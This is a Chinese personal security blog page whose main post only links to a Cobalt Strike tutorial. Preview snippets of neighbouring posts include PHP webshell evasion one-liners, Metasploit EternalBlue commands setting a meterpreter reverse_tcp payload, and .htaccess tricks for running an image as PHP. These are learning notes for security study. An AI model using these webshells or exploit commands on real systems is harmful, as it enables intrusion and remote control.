avatar
文章
251
标签
37
分类
49
首页
时间轴
标签
分类
友链
关于
留言板
RickCobalt Strike使用
搜索
首页
时间轴
标签
分类
友链
关于
留言板

Cobalt Strike使用

发表于2022-04-26|更新于2024-03-19|安全安全工具
|总字数:19|阅读时长:1分钟|浏览量:

Cobalt Strike基础教程

Cobalt Strike使用教程一


https://zhuanlan.zhihu.com/p/359251293

文章作者: LYC
文章链接: http://991688344.github.io/2022/04/26/Cobalt-Strike%E4%BD%BF%E7%94%A8/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Rick!
安全
cover of previous post
上一篇
webshell免杀
代码执行与命令执行: 代码执行: 可以用来执行代码的函数,参数是代码。例如eval() 命令执行: 可以用来执行命令的函数,参数是命令。例如system() 动态执行 12345678910<?phpassert($_POST['x']);$e = 'assert'; //eval不行$e("phpinfo();");$a = 'system'; $a("phpinfo();");?> php函数调用的对象必须是一个函数,但不包括eval,eval在php底层不是一个函数,assert是 回调函数 1234<?php$e = $_REQUEST['e'];?> 变量掺杂 1234567<?php$z = 'test';$$z = $_POST['x'];eval('',$test);?> 二维数组 编码绕过 无字母的马
cover of next post
下一篇
MSF使用
基础使用 1234567891011msfconsole # 进入框架search ms17_010 # 使用search命令查找相关漏洞use exploit/windows/smb/ms17_010_eternalblue # 使用use进入模块info # 使用info查看模块信息show targets # 显示当前攻击模块针对哪些特定操作系统版本、语言版本的系统show payloads # 查看可用的payload,默认reverse_tcpset payload windows/x64/meterpreter/reverse_tcp # 设置payloadshow options # 查看模块需要配置的参数set RHOST 192.168.100.158 # 设置参数exploit / run ...
相关推荐
cover
2020-03-27
CORS与jsonp
https://juejin.im/post/5cb5c40ff265da03a158210e
cover
2020-02-25
CSRF漏洞
什么是CSRF ​ CSRF(Cross-site request forgery)跨站请求伪造,也被称为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。CSRF通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。 ​ ​ 下图是一次完整的CSRF攻击示意图。用户登录并访问了一正常网站,登录成功后,网站返回用户的身份标识Cookie给用户。当用户访问到恶意网站时,恶意网站强制用户去向正常网站发送恶意请求。由于用户此时拥有正常网站的Cookie,所以就相当于攻击者盗用了用户身份,去访问了正常(目标)网站。 一次完整的CSRF攻击,需要受害用户需要完成两个步骤: ​ 1.登录正常网站,并在本地生成Cookie。 ​ ​ 2.在不退出正常网站的情况下,访问恶意网站。 CSRF 背景与介绍 CSRF(Cross Site Request...
cover
2020-05-07
CTF中的htaccess
服务器中间件为apache,因此想到了传.htaceess来解析php,通常我们用 .htaccess来解析非php后缀文件时用到 AddType application/x-httpd-php .ppp 或者 123<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php</FilesMatch> auto_append_file和auto_prepend_file 相关bypass 如果文件末尾被自动加上一句话,会导致服务器500错误,这时候可以在最后添加#\ 将换行转义成普通字符 如果特殊字符被实体编码, 可以通过特殊编码来绕过 相关比赛 XNUCA2019Qualifier
cover
2022-05-18
CVE-2020-17523_Apache_Shiro身份认证绕过
CVE-2019-12422 漏洞描述 Shiro RememberMe 反序列化漏洞 漏洞成因 由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。 shiro对于Cookie处理做了如下实现: 123456789101112131415161718192021222324252627282930protected byte[] decrypt(byte[] encrypted) { byte[] serialized = encrypted; CipherService cipherService = getCipherService(); if (cipherService != null) { ByteSource byteSource = cipherService.decrypt(encrypted,...
cover
2022-05-18
CVE-2020-17523_Apache_Shiro身份认证绕过
CVE-2020-17523 漏洞描述 Apache Shiro身份认证绕过漏洞 漏洞成因 Shiro中对于URL的获取及匹配在org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getChain 先看下这个getChain方法: 12345678910111213141516171819202122232425262728293031323334353637public FilterChain getChain(ServletRequest request, ServletResponse response, FilterChain originalChain) { FilterChainManager filterChainManager = getFilterChainManager(); if (!filterChainManager.hasChains()) { return null; } ...
cover
2020-10-30
DHCP服务器攻防
DHCP服务器的防攻击手段 (一)、DHCP服务器面临的安全威胁 DHCP在设计上未充分考虑到安全因素,从而留下许多安全漏洞,使得DHCP很容易受到攻击。在实际网络中,针对DHCP攻击的手段主要有以下三种: 1、DHCP饿死攻击 【攻击原理】:攻击者持续大量地向DHCP服务器申请IP地址,直到耗尽DHCP服务器地址池的IP地址,使DHCP服务器无法再给正常的主机分配IP地址 在PC机给DHCP Server发送的DHCP Discover 报文中有一个CHADDR字段,该字段是由DHCP客户端填写的,用来表示客户端的硬件地址(MAC地址),而DHCP Server 也是根据CHADDR字段来分配IP地址的,对于不同的CHADDR,DHCP Server会分配不同的IP地址,因为DHCP Server 无法识别CHADDR的合法性,攻击者就利用这个漏洞,不断的改变CHADDR字段的值,来冒充不同的用户申请IP地址,使DHCP Server 中IP池枯竭,从而达到攻击目的。 2、仿冒DHCP Server攻击 【攻击原理】:当攻击者私自安装并运行DHCP Server...

评论
avatar
LYC
文章
251
标签
37
分类
49
Follow Me
公告
This is
最新文章
4GPU服务器环境配置及维护
4GPU服务器环境配置及维护2023-08-29
UEFI+systemd开机启动流程
UEFI+systemd开机启动流程2023-08-29
udev配置Linux网络接口
udev配置Linux网络接口2023-08-27
实验室服务器网络运维
实验室服务器网络运维2023-08-27
Attention机制_transformer
Attention机制_transformer2022-11-21
©2019 - 2024 By LYC
框架 Hexo|主题 Butterfly
搜索
数据加载中